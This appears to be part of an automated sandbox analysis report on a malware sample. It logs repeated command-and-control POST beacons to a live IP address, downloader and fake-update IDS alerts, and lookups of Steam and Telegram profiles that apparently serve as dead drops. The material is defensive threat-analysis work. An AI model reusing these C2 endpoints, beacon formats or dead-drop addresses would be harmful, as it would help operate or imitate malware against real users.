Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 104.21.22.222 104.21.22.222
Source: Joe Sandbox View	IP Address: 34.117.188.166 34.117.188.166

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49771 -> 104.21.67.145:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49760 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49778 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49783 -> 104.21.22.222:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49796 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49804 -> 23.55.153.106:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49827 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49789 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49834 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49860 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49913 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49886 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49941 -> 104.21.79.7:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49939 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49953 -> 23.55.153.106:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49961 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49970 -> 31.41.244.11:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49975 -> 185.215.113.16:80

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00EDE0C0 recv,recv,recv,recv,

0_2_00EDE0C0

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /detct0r HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: zonedw.sbsConnection: Keep-AliveCache-Control: no-cache
